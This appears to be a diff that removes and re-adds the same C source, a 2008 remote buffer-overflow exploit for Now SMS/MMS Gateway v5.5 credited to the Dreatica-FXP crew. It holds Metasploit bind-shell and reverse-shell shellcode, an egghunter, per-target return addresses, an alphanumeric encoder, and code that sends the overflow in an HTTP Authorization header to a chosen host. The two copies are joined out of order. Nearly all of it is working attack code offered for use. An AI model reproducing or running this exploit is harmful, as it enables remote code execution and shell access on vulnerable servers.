-		"\x4b\x71\x6c\x35\x55\x64\x38\x54\x41\x58\x6f\x4c\x4b\x30\x4f\x47"
-		"\x68\x4e\x6b\x53\x6f\x47\x50\x74\x41\x58\x6b\x70\x49\x4c\x4b\x35"
-		"\x64\x6c\x4b\x36\x61\x68\x6e\x57\x41\x79\x50\x6f\x69\x4c\x6c\x6c"
-		"\x44\x4b\x70\x63\x44\x43\x37\x5a\x61\x78\x4a\x44\x4d\x36\x61\x6a"
-		"\x62\x38\x6b\x78\x74\x77\x4b\x51\x44\x74\x64\x76\x48\x51\x65\x4a"
-		"\x45\x4e\x6b\x73\x6f\x61\x34\x55\x51\x5a\x4b\x71\x76\x6c\x4b\x64"
-		"\x4c\x72\x6b\x4e\x6b\x63\x6f\x57\x6c\x75\x51\x7a\x4b\x33\x33\x34"
-		"\x6c\x6c\x4b\x6e\x69\x72\x4c\x45\x74\x45\x4c\x30\x61\x4f\x33\x50"
-		"\x31\x69\x4b\x61\x74\x6c\x4b\x57\x33\x66\x50\x4e\x6b\x43\x70\x64"
-		"\x4c\x6e\x6b\x32\x50\x65\x4c\x6e\x4d\x6e\x6b\x77\x30\x67\x78\x31"
-		"\x4e\x33\x58\x6c\x4e\x30\x4e\x34\x4e\x5a\x4c\x50\x50\x4b\x4f\x69"
-		"\x46\x72\x46\x62\x73\x70\x66\x35\x38\x57\x43\x35\x62\x45\x38\x30"
-		"\x77\x63\x43\x44\x72\x71\x4f\x71\x44\x79\x6f\x4a\x70\x73\x58\x78"
-		"\x4b\x48\x6d\x4b\x4c\x77\x4b\x56\x30\x79\x6f\x7a\x76\x51\x4f\x6f"
-		"\x79\x79\x75\x32\x46\x4b\x31\x48\x6d\x43\x38\x45\x52\x70\x55\x73"
-		"\x5a\x33\x32\x6b\x4f\x4a\x70\x72\x48\x69\x49\x36\x69\x4c\x35\x6e"
-		"\x4d\x50\x57\x4b\x4f\x6a\x76\x36\x33\x36\x33\x61\x43\x33\x63\x62"
-		"\x73\x43\x73\x36\x33\x50\x43\x63\x63\x4b\x4f\x68\x50\x43\x56\x71"
-		"\x78\x62\x31\x51\x4c\x30\x66\x30\x53\x6b\x39\x78\x61\x4c\x55\x65"
-		"\x38\x4e\x44\x67\x6a\x74\x30\x6f\x37\x70\x57\x69\x6f\x6e\x36\x32"
-		"\x4a\x36\x70\x43\x61\x32\x75\x79\x6f\x4e\x30\x50\x68\x4f\x54\x6e"
-		"\x4d\x64\x6e\x6d\x39\x52\x77\x79\x6f\x58\x56\x66\x33\x36\x35\x69"
-		"\x6f\x4e\x30\x45\x38\x38\x65\x72\x69\x6b\x36\x77\x39\x33\x67\x79"
-		"\x6f\x6e\x36\x70\x50\x31\x44\x62\x74\x73\x65\x6b\x4f\x58\x50\x6d"
-		"\x43\x50\x68\x4b\x57\x44\x39\x4f\x36\x64\x39\x71\x47\x6b\x4f\x49"
-		"\x46\x63\x65\x6b\x4f\x4a\x70\x71\x76\x50\x6a\x50\x64\x50\x66\x70"
-		"\x68\x50\x63\x52\x4d\x6e\x69\x58\x65\x32\x4a\x46\x30\x63\x69\x45"
-		"\x79\x48\x4c\x4c\x49\x7a\x47\x63\x5a\x70\x44\x4d\x59\x78\x62\x36"
-		"\x51\x39\x50\x38\x73\x4f\x5a\x6b\x4e\x41\x52\x64\x6d\x6b\x4e\x32"
-		"\x62\x36\x4c\x4e\x73\x4c\x4d\x43\x4a\x34\x78\x4c\x6b\x6e\x4b\x6e"
-		"\x4b\x51\x78\x70\x72\x6b\x4e\x4e\x53\x47\x66\x4b\x4f\x32\x55\x50"
-		"\x44\x4b\x4f\x7a\x76\x43\x6b\x70\x57\x62\x72\x46\x31\x66\x31\x32"
-		"\x71\x30\x6a\x35\x51\x33\x61\x32\x71\x33\x65\x53\x61\x4b\x4f\x5a"
-		"\x70\x30\x68\x6e\x4d\x6e\x39\x73\x35\x7a\x6e\x62\x73\x4b\x4f\x48"
-		"\x56\x63\x5a\x6b\x4f\x59\x6f\x57\x47\x39\x6f\x6e\x30\x4e\x6b\x30"
-		"\x57\x59\x6c\x4b\x33\x38\x44\x45\x34\x59\x6f\x39\x46\x50\x52\x39"
-		"\x6f\x58\x50\x65\x38\x38\x70\x6e\x6a\x37\x74\x53\x6f\x31\x43\x6b"
-		"\x4f\x6a\x76\x6b\x4f\x78\x50\x42"
-	 },	  
-	 {"ReverseShell      [ args: -R  ]", 
-		287,
-		/*
-		* windows/shell_reverse_tcp - 287 bytes
-		* http://www.metasploit.com
-		* Encoder: generic/none	
-		*/	
-		"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b"
-		"\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01"
-		"\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07"
-		"\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f"
-		"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b"
-		"\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c"
-		"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff"
-		"\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0"
-		"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08"
-		"\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53"
-		"\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68\x7f\x00\x00\x01\x66"
-		"\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff"
-		"\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a"
-		"\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95"
-		"\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab\x68"
-		"\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51"
-		"\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff"
-		"\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04"
-		"\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6"
-		"\xff\xd0"
-	},
-	{NULL, 0, NULL}
-};
- 
-
-
- 
-struct _target{
-	const char *t ;
-	unsigned long ret ;
-} targets[]=
-{	
-	{"Now SMS/MMS Gateway universal",          0x10002f9d },
-	{"Now SMS/MMS Gateway v5.5",               0x0027727c },	
-	{"DOS/Crash/Debug/Test/Fun",               0x41414141 },
-	{NULL,                                     0x00000000 }
-};
-
-
-char egghunter[] = 
-	"\x33\xd2\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05"
-	"\x5a\x74\xef\xb8\x44\x46\x58\x50\x8b\xfa\xaf\x75\xea\xaf\x75\xe7"
-	"\xff\xe7";	
-
-char header_b[] = 
-				"GET / HTTP/1.0\r\n"
-				"User-Agent: ";
-char header_m[] ="\r\n"
-				"Authorization: Basic ";
-char header_e[] = "\r\n\r\n";
-
-
-// memory for buffers
-unsigned char payloadbuffer[10000], a_buffer[10000];
-long dwTimeout=5000;
-int timeout=5000;
-
-// alphanumeric decoder took from "ALPHA 2: Zero-tolerance." code
-char alphanum_decoder[] = 
-		"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
-		"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41"
-		"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
-		"\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49";
-// alphanumeric encoder took from "ALPHA 2: Zero-tolerance." code
-int alphanumeric_exec(char *to_encode, int len, char *encoded, int * rlen )
-{
-	int   i,ii=0, input, A, B, C, D, E, F, length=(int)strlen(to_encode);
-	char* valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; // mixed chars
-	char temp[10];
-	memset(temp, 0 , sizeof(temp));	
-	srand((int)clock());  
-	for(ii=0;ii> 4;
-		B = (input & 0x0f);
-		F = B;
-		i = rand() % ((int)strlen(valid_chars));
-		while ((valid_chars[i] & 0x0f) != F) { i = ++i % ((int)strlen(valid_chars)); }
-		E = valid_chars[i] >> 4;
-		D = (A^E);
-		i = rand() % ((int)strlen(valid_chars));
-		while ((valid_chars[i] & 0x0f) != D) { i = ++i % ((int)strlen(valid_chars)); }
-		C = valid_chars[i] >> 4;
-		sprintf(temp,"%c%c", (C<<4)+D, (E<<4)+F);
-		encoded[strlen(encoded)]=temp[0];
-		encoded[strlen(encoded)]=temp[1];
-	}
-	encoded[strlen(encoded)]='A';
-	*rlen=(int)strlen(encoded);
-	return 1;
-
-}
-
-int main(int argc, char **argv)
-{
-	char c,*remotehost=NULL,*file=NULL,*reverseip=NULL,*url=NULL,temp1[100];
-	int HAVE_R=0,HAVE_U=0,sh,port=8800,itarget=0,reverseport=9999;
-	struct _buf  fshellcode, sbuffer;
-
-	logo();
-	if(argc<2)
-	{
-		usage(argv[0]);		
-		return -1;
-	}
-
-	WSADATA wsa;
-	WSAStartup(MAKEWORD(2,0), &wsa);
-	// set defaults
-	sh=0;	
-	// ------------	
-	
-	while((c = getopt(argc, argv, "h:t:R:T:"))!= EOF)
-	{
-		switch (c)
-		{
-			case 'h':
-				if (strchr(optarg,':')==NULL)
-				{
-					remotehost=optarg;
-				}else 
-				{
-					sscanf(strchr(optarg,':')+1, "%d", &port);
-					remotehost=optarg;
-					*(strchr(remotehost,':'))='\0';
-				}
-				break; 				
-			case 't':
-				sscanf(optarg, "%d", &itarget);
-				itarget--;
-				break;
-			case 'R':
-				HAVE_R=1;
-				if (strchr(optarg,':')==NULL)
-				{
-					reverseip=optarg;
-				}else 
-				{
-					sscanf(strchr(optarg,':')+1, "%d", &reverseport);
-					reverseip=optarg;
-					*(strchr(reverseip,':'))='\0';
-				}
-				break;			
-			case 'T':				
-				sscanf(optarg, "%ld", &dwTimeout);
-				break; 			
-			default:
-	            usage(argv[0]);
-				WSACleanup();
-			return -1;
-		}		
-	}	
-	sh=HAVE_R;
-
-	if(remotehost == NULL)
-	{
-		printf("   [-] Please enter remotehost\n");
-		end_logo();
-		WSACleanup();
-		return -1;
-	}
-	print_info_banner_line("Host", remotehost);
-	sprintf(temp1, "%d", port);
-	print_info_banner_line("Port", temp1);
-	print_info_banner_line("Payload", shellcodes[sh].name);
-
-	if(sh==0)
-	{		
-		sprintf(temp1, "%d", 4444);
-		print_info_banner_line("BINDPort", temp1);
-	}
-	if(sh==1)
-	{
-		print_info_banner_line("CB IP", reverseip);
-		sprintf(temp1, "%d", reverseport);
-		print_info_banner_line("CB port", temp1);
-	}
-	printf(" # ------------------------------------------------------------------- # \n");
-	fflush(stdout);
-
-
-	memset(payloadbuffer, 0, sizeof(payloadbuffer));
-	fshellcode.ptr=payloadbuffer;
-	fshellcode.size=0;	
-
-	memset(a_buffer, 0, sizeof(a_buffer));
-	sbuffer.ptr=a_buffer;
-	sbuffer.size=0;
-
-	if(!construct_shellcode(sh, &fshellcode, itarget, reverseip, reverseport))
-	{
-		end_logo();
-		WSACleanup();
-		return -1;
-	}
-
-	printf("   [+] Payload constructed\n");
-	
-	if(!construct_buffer(&fshellcode, itarget, &sbuffer))
-	{
-		printf("   [-] Buffer not constructed\n");
-		end_logo();
-		WSACleanup();
-		return -1;
-	}
-	printf("   [+] Final buffer constructed\n");
-	
-
-	if(!execute(&sbuffer, remotehost, port))
-	{
-		printf("   [-] Buffer not sent\n");
-		end_logo();
-		WSACleanup();
-		return -1;
-	}
-	printf("   [+] Buffer sent\n");
-	
-	end_logo();
-	WSACleanup();
-	return 0;
-}
-int construct_shellcode(int sh, struct _buf * shf, int target, char * rerverseip, int reverseport)
-{
-	int x;
-	char fsh[1000];
-
-	memcpy(shf->ptr, shellcodes[sh].shellcode, shellcodes[sh].length);
-	shf->size=shellcodes[sh].length;
-	if(sh==1)
-	{		
-		memset(shf->ptr,0,shf->size+1);
-		memset(fsh,0,sizeof(fsh));
-		memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length);
-		
-
-		static struct hostent *host = gethostbyname(rerverseip);
-		static struct sockaddr_in addr;
-		if(host == NULL)
-		{
-			printf("   [-] Reverse ip/hostanme is invalid\n");
-			return 0;
-		}
-
-		addr.sin_addr = *(struct in_addr*)host->h_addr;
-		fsh[160] = (addr.sin_addr.S_un.S_un_b.s_b1) ;
-		fsh[161] = (addr.sin_addr.S_un.S_un_b.s_b2) ;
-		fsh[162] = (addr.sin_addr.S_un.S_un_b.s_b3) ;
-		fsh[163] = (addr.sin_addr.S_un.S_un_b.s_b4) ;
-        
-		fsh[166] = ((reverseport >> 8) & 0xff) ;
-		fsh[167] = ((reverseport     ) & 0xff) ;	
-		
-		memcpy(shf->ptr,alphanum_decoder,sizeof(alphanum_decoder)-1);
-		alphanumeric_exec(fsh, shellcodes[sh].length, (char*)(shf->ptr+sizeof(alphanum_decoder)-1), &x);
-		shf->size = sizeof(alphanum_decoder)-1+x;
-	}
-	return 1;
-}
-
-int construct_buffer(struct _buf * shf, int target, struct _buf * sbuf)
-{
-	unsigned char * cp, *lp ;
-	char buf[10000],encoded[10000],encoded2[10000], useragent[10000];
-	int len, slen;
-
-	//
-	cp=(unsigned char *)useragent;	
-	*cp++ = '\x44';
-	*cp++ = '\x46';
-	*cp++ = '\x58';
-	*cp++ = '\x50';
-	*cp++ = '\x44';
-	*cp++ = '\x46';
-	*cp++ = '\x58';
-	*cp++ = '\x50';
-	*cp++ = '\x41';
-	*cp++ = '\x41';
-	*cp++ = '\x41';
-	memcpy(cp, shf->ptr, shf->size);
-	cp+=shf->size;
-	slen=(int)(cp-(unsigned char *)useragent);
-
-	
-	// make egghunter
-	memset(buf, 0, sizeof(buf));
-	memset(encoded, 0, sizeof(encoded));
-	memset(encoded2, 0, sizeof(encoded2));
-
-	cp=(unsigned char *)buf;
-	memset(cp, '\x41', 129);	
-	cp+=129;	
-
-	*cp++ = (unsigned char)((targets[target].ret      ) & 0xff);
-	*cp++ = (unsigned char)((targets[target].ret >>  8) & 0xff);
-	*cp++ = (unsigned char)((targets[target].ret >> 16) & 0xff);
-	*cp++ = (unsigned char)((targets[target].ret >> 24) & 0xff);
-
-	*cp++ = '\x90';
-	*cp++ = '\x90';
-	*cp++ = '\x90';
-	*cp++ = '\x90';
-
-	memcpy(cp, egghunter, strlen(egghunter));
-	cp+=strlen(egghunter);
-
-	memset(cp, '\x42', 500);	
-	cp+=500;		
-	len=(int)(cp-(unsigned char * )buf);
-	base64_encode((const unsigned char *)buf,len,(char *)encoded);
-	base64_encode((const unsigned char *)encoded,strlen(encoded),(char *)encoded2);
-	// ---
-
-
-	cp = sbuf->ptr;
-	memcpy(cp, header_b,strlen(header_b));
-	cp+=strlen(header_b);
-	memcpy(cp, useragent,slen);
-	cp+=slen;	
-	memcpy(cp, header_m,strlen(header_m));
-	cp+=strlen(header_m);
-	memcpy(cp, encoded2,strlen(encoded2));
-	cp+=strlen(encoded2);	
-	memcpy(cp, header_e,strlen(header_e));
-	cp+=strlen(header_e);
-	
-	sbuf->size=(int)(cp-sbuf->ptr);
-	return 1;
-}
-
-
-void extract_ip_and_port( char * &remotehost, int * port, char * str)
-{
-	if (strchr(str,':')==NULL)
-	{
-		remotehost=str;
-	}else 
-	{
-		sscanf(strchr(str,':')+1, "%d", port);
-		remotehost=str;
-		*(strchr(remotehost,':'))='\0';
-	}
-}
-
-
-
-int hr2_connect(char * remotehost, int port, int timeout)
-{
-	SOCKET s;
-	struct hostent *host;
-	struct sockaddr_in addr;
-	TIMEVAL stTime;
-	TIMEVAL *pstTime = NULL;
-	fd_set x;
-	int res;
-
-	if (INFINITE != timeout) 
-	{
-	    stTime.tv_sec = timeout / 1000;
-	    stTime.tv_usec = timeout % 1000;
-	    pstTime = &stTime;
-	}
-
-	host = gethostbyname(remotehost);
-	if (!host) return SOCKET_ERROR;
-
-	addr.sin_addr = *(struct in_addr*)host->h_addr;
-	addr.sin_port = htons(port);
-	addr.sin_family = AF_INET;
-
-	s = socket(AF_INET, SOCK_STREAM, 0);
-	if (s == SOCKET_ERROR)
-	{
-		closesocket(s);
-		return SOCKET_ERROR;
-	}
-
-	unsigned long l = 1;
-	ioctlsocket( s, FIONBIO, &l ) ;
-
-	connect(s, (struct sockaddr*)&addr, sizeof(addr));
-
-	FD_ZERO(&x);
-	FD_SET(s, &x);
-
-	res = select(NULL,NULL,&x,NULL,pstTime);
-	if(res< 0) return SOCKET_ERROR;
-	if(res==0) return 0;
-	return (int)s;
-}
-
-
-int hr2_tcpsend(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
-{
-	return send(s, (char *)buf, len, 0);
-}
-
-int hr2_tcprecv(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
-{
-	TIMEVAL stTime;
-	TIMEVAL *pstTime = NULL;
-	fd_set xy;
-	int res;
-
-	if (INFINITE != timeout) 
-	{
-	    stTime.tv_sec = timeout / 1000;
-	    stTime.tv_usec = timeout % 1000;
-	    pstTime = &stTime;
-	}
-	FD_ZERO(&xy);
-	FD_SET(s, &xy);
-	
-	res = select(NULL,&xy,NULL,NULL,pstTime);
-
-	if(res==0) return 0;
-	if(res<0) return -1;
-
-	return recv(s, (char *)buf, len, 0);
-}
-
-int execute(struct _buf * abuf, char * remotehost, int port)
-{
-	int x;
-	SOCKET s ;
-
-	s = hr2_connect(remotehost, port, 10000);
-	if(s==0)
-	{
-		printf("   [-] connect() timeout\n");
-		return 0;
-	}
-	if(s==SOCKET_ERROR)
-	{
-		printf("   [-] Connection failed\n");
-		return 0;
-	}		
-	x = hr2_tcpsend(s, abuf->ptr, abuf->size, 0);
-	printf("   [+] Sent %d out of %d bytes\n", x, abuf->size);
-
-	closesocket(s);
-	return 1;
-}
-
-// -----------------------------------------------------------------
-// XGetopt.cpp  Version 1.2
-// -----------------------------------------------------------------
-int getopt(int argc, char *argv[], char *optstring)
-{
-	static char *next = NULL;
-	if (optind == 0)
-		next = NULL;
-
-	optarg = NULL;
-
-	if (next == NULL || *next == '\0')
-	{
-		if (optind == 0)
-			optind++;
-
-		if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
-		{
-			optarg = NULL;
-			if (optind < argc)
-				optarg = argv[optind];
-			return EOF;
-		}
-
-		if (strcmp(argv[optind], "--") == 0)
-		{
-			optind++;
-			optarg = NULL;
-			if (optind < argc)
-				optarg = argv[optind];
-			return EOF;
-		}
-
-		next = argv[optind];
-		next++;		// skip past -
-		optind++;
-	}
-
-	char c = *next++;
-	char *cp = strchr(optstring, c);
-
-	if (cp == NULL || c == ':')
-		return '?';
-
-	cp++;
-	if (*cp == ':')
-	{
-		if (*next != '\0')
-		{
-			optarg = next;
-			next = NULL;
-		}
-		else if (optind < argc)
-		{
-			optarg = argv[optind];
-			optind++;
-		}
-		else
-		{
-			return '?';
-		}
-	}
-
-	return c;
-}
-// -----------------------------------------------------------------
-// -----------------------------------------------------------------
-// -----------------------------------------------------------------
-
-
-
-// -----------------------------------------------------------------
-// BASE64
-// -----------------------------------------------------------------
-char base64_chars[] = 
-             "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
-             "abcdefghijklmnopqrstuvwxyz"
-             "0123456789+/";
-
-
-static inline bool is_base64(unsigned char c) {
-  return (isalnum(c) || (c == '+') || (c == '/'));
-}
-
-void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, char * ret) 
-{
-  int i = 0;
-  int j = 0;
-  unsigned char char_array_3[3];
-  unsigned char char_array_4[4];
-
-  while (in_len--) 
-  {
-    char_array_3[i++] = *(bytes_to_encode++);
-    if (i == 3) {
-      char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
-      char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
-      char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
-      char_array_4[3] = char_array_3[2] & 0x3f;
-
-      for(i = 0; (i <4) ; i++)
-		ret[strlen(ret)]=base64_chars[char_array_4[i]];
-      i = 0;
-    }
-  }
-
-  if (i)
-  {
-    for(j = i; j < 3; j++)
-      char_array_3[j] = '\0';
-
-    char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
-    char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
-    char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
-    char_array_4[3] = char_array_3[2] & 0x3f;
-
-    for (j = 0; (j < i + 1); j++)
-		ret[strlen(ret)]=base64_chars[char_array_4[j]];
-
-    while((i++ < 3))
-		ret[strlen(ret)]='=';
-
-  }
-
-
-}
-
-// -----------------------------------------------------------------
-// End of BASE64
-// -----------------------------------------------------------------
-
-
-
-
-void print_info_banner_line(const char * key, const char * val)
-{
-	char temp1[100], temp2[100];
-
-	memset(temp1,0,sizeof(temp1));	
-	memset(temp1, '\x20' , 58 - strlen(val) -1);	
-
-	memset(temp2,0,sizeof(temp2));
-	memset(temp2, '\x20' , 8 - strlen(key));	
-	printf(" #  %s%s: %s%s# \n", key, temp2, val, temp1);	
-
-}
-
-
-
-void usage(char * s)
-{	
-	int j;
-	printf("\n");
-	printf("    Usage: %s -h  -t  -R \n", s);
-	printf("   -------------------------------------------------------------------\n");
-	printf("    Arguments:\n");
-	printf("      -h ........ host to attack, default port: 8800\n");
-	printf("      -t ........ target to use\n");	
-	printf("      -R ........ host and port for back connect\n");	
-	printf("      -T ........ socket timeout\n");
-	printf("\n");
-	printf("    Supported ASUS DPCProxy versions:\n");
-	for(j=0; targets[j].t!=0;j++)
-	{
-		printf("      %d. %s\n",j+1, targets[j].t);
-	}					
-	printf("\n");
-	for(j=0; shellcodes[j].name!=0;j++)
-	{
-		printf("      %d. %s\n",j+1, shellcodes[j].name);
-	}		
-	end_logo();	
-}
-
-void logo()
-{
-	printf("\n\n");
-	printf(" ####################################################################### \n");	
-	printf(" #     ____                 __  _                  ______  __    _____ #\n");
-	printf(" #    / __ \\________  _____/ /_(_)_________       / __/\\ \\/ /   / _  / #\n");
-	printf(" #   / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___  / /    \\  /   / // /  #\n");
-	printf(" #  / /_/ / / /  ___/ /_// /_/ / /__/ /_// /__/ / _/    /  \\  / ___/   #\n");
-	printf(" # /_____/_/  \\___/ \\_,_/\\__/_/\\___/\\__,_/     /_/     /_/\\_\\/_/       #\n");
-	printf(" #                                 crew                                #\n");
-	printf(" ####################################################################### \n");	
-	printf(" #  Exploit : Now SMS/MMS Gateway v5.5 Remote Buffer Overflow Exploit  # \n");
-	printf(" #  Author  : Heretic2 (http://www.dreatica.cl/)                       # \n");
-	printf(" #  Version : 1.0                                                      # \n");
-	printf(" #  System  : Windows ALL                                              # \n");
-	printf(" #  Date    : 14.04.2008                                               # \n");
-	printf(" # ------------------------------------------------------------------- # \n");
-}
-
-void end_logo()
-{
-	printf(" # ------------------------------------------------------------------- # \n");
-	printf(" #                    Dreatica-FXP crew [Heretic2]                     # \n");	
-	printf(" ####################################################################### \n\n");
-}
-
-// milw0rm.com [2008-05-29]
+/* Dreatica-FXP crew
+* 
+* ----------------------------------------
+* Target         : Now SMS/MMS Gateway v5.5 and others
+* ----------------------------------------
+* Exploit        : Now SMS/MMS Gateway v5.5 Remote Buffer Overflow Exploit
+* Exploit date   : 14.04.2008
+* Exploit writer : Heretic2 (heretic2x@gmail.com)
+* OS             : Windows ALL 
+* Tested         : Windows 2000 Server
+* Crew           : Dreatica-FXP
+* Location       : http://www.milw0rm.com/
+* ----------------------------------------
+* Info           : We obtain EIP after sending a long Authentificate request to server
+*                  Egghunter help here.
+* ----------------------------------------
+* Thanks to:
+*		1. Luigi Auriemma          ( http://aluigi.org    )
+*		2. The Metasploit project  ( http://metasploit.com                           ) 
+*       3. ALPHA 2: Zero-tolerance (                  ) 
+*		4. Dreatica-FXP crew       (                                                 )
+************************************************************************************
+* This was written for educational purpose only. Use it at your own risk. Author will be not be 
+* responsible for any damage, caused by that code.
+*/
+
+#include 
+#include 
+#include 
+#include 
+#include 
+
+#pragma comment(lib,"ws2_32")
+
+
+void usage(char * s);
+void logo();
+void end_logo();
+void print_info_banner_line(const char * key, const char * val);
+
+void extract_ip_and_port( char * &remotehost, int * port, char * str);
+int  fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx);
+void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, char * ret);
+
+int hr2_connect(char * remotehost, int port, int timeout);
+int hr2_udpconnect(char * remotehost, int port,  struct sockaddr_in * addr, int timeout);
+int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout);
+int execute(struct _buf * abuf, char * remotehost, int port);
+
+struct _buf 
+{
+	unsigned char * ptr;
+	unsigned int size;
+};
+int construct_shellcode(int sh, struct _buf * shf, int target,char * rerverseip, int reverseport);
+int construct_buffer(struct _buf * shf, int target, struct _buf * abuf);
+
+
+
+
+// -----------------------------------------------------------------
+// XGetopt.cpp  Version 1.2
+// -----------------------------------------------------------------
+int getopt(int argc, char *argv[], char *optstring);
+char	*optarg;		// global argument pointer
+int		optind = 0, opterr; 	// global argv index
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+
+
+struct {
+	const char * name;
+	int length;
+	char *shellcode;	
+}shellcodes[]={ 	
+	 {"Bindshell, port 4444   [ args: none          ]", 696, 
+		 /* win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
+		"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x37\x49\x49\x49"
+		"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
+		"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x42\x32\x42\x41\x32"
+		"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x6a\x49\x4b\x4c\x62"
+		"\x4a\x68\x6b\x30\x4d\x59\x78\x49\x69\x4b\x4f\x79\x6f\x69\x6f\x71"
+		"\x70\x4e\x6b\x32\x4c\x51\x34\x64\x64\x6e\x6b\x41\x55\x77\x4c\x4c"
+		"\x4b\x71\x6c\x35\x55\x64\x38\x54\x41\x58\x6f\x4c\x4b\x30\x4f\x47"
+		"\x68\x4e\x6b\x53\x6f\x47\x50\x74\x41\x58\x6b\x70\x49\x4c\x4b\x35"
+		"\x64\x6c\x4b\x36\x61\x68\x6e\x57\x41\x79\x50\x6f\x69\x4c\x6c\x6c"
+		"\x44\x4b\x70\x63\x44\x43\x37\x5a\x61\x78\x4a\x44\x4d\x36\x61\x6a"
+		"\x62\x38\x6b\x78\x74\x77\x4b\x51\x44\x74\x64\x76\x48\x51\x65\x4a"
+		"\x45\x4e\x6b\x73\x6f\x61\x34\x55\x51\x5a\x4b\x71\x76\x6c\x4b\x64"
+		"\x4c\x72\x6b\x4e\x6b\x63\x6f\x57\x6c\x75\x51\x7a\x4b\x33\x33\x34"
+		"\x6c\x6c\x4b\x6e\x69\x72\x4c\x45\x74\x45\x4c\x30\x61\x4f\x33\x50"
+		"\x31\x69\x4b\x61\x74\x6c\x4b\x57\x33\x66\x50\x4e\x6b\x43\x70\x64"
+		"\x4c\x6e\x6b\x32\x50\x65\x4c\x6e\x4d\x6e\x6b\x77\x30\x67\x78\x31"
+		"\x4e\x33\x58\x6c\x4e\x30\x4e\x34\x4e\x5a\x4c\x50\x50\x4b\x4f\x69"
+		"\x46\x72\x46\x62\x73\x70\x66\x35\x38\x57\x43\x35\x62\x45\x38\x30"
+		"\x77\x63\x43\x44\x72\x71\x4f\x71\x44\x79\x6f\x4a\x70\x73\x58\x78"
+		"\x4b\x48\x6d\x4b\x4c\x77\x4b\x56\x30\x79\x6f\x7a\x76\x51\x4f\x6f"
+		"\x79\x79\x75\x32\x46\x4b\x31\x48\x6d\x43\x38\x45\x52\x70\x55\x73"
+		"\x5a\x33\x32\x6b\x4f\x4a\x70\x72\x48\x69\x49\x36\x69\x4c\x35\x6e"
+		"\x4d\x50\x57\x4b\x4f\x6a\x76\x36\x33\x36\x33\x61\x43\x33\x63\x62"
+		"\x73\x43\x73\x36\x33\x50\x43\x63\x63\x4b\x4f\x68\x50\x43\x56\x71"
+		"\x78\x62\x31\x51\x4c\x30\x66\x30\x53\x6b\x39\x78\x61\x4c\x55\x65"
+		"\x38\x4e\x44\x67\x6a\x74\x30\x6f\x37\x70\x57\x69\x6f\x6e\x36\x32"
+		"\x4a\x36\x70\x43\x61\x32\x75\x79\x6f\x4e\x30\x50\x68\x4f\x54\x6e"
+		"\x4d\x64\x6e\x6d\x39\x52\x77\x79\x6f\x58\x56\x66\x33\x36\x35\x69"
+		"\x6f\x4e\x30\x45\x38\x38\x65\x72\x69\x6b\x36\x77\x39\x33\x67\x79"
+		"\x6f\x6e\x36\x70\x50\x31\x44\x62\x74\x73\x65\x6b\x4f\x58\x50\x6d"
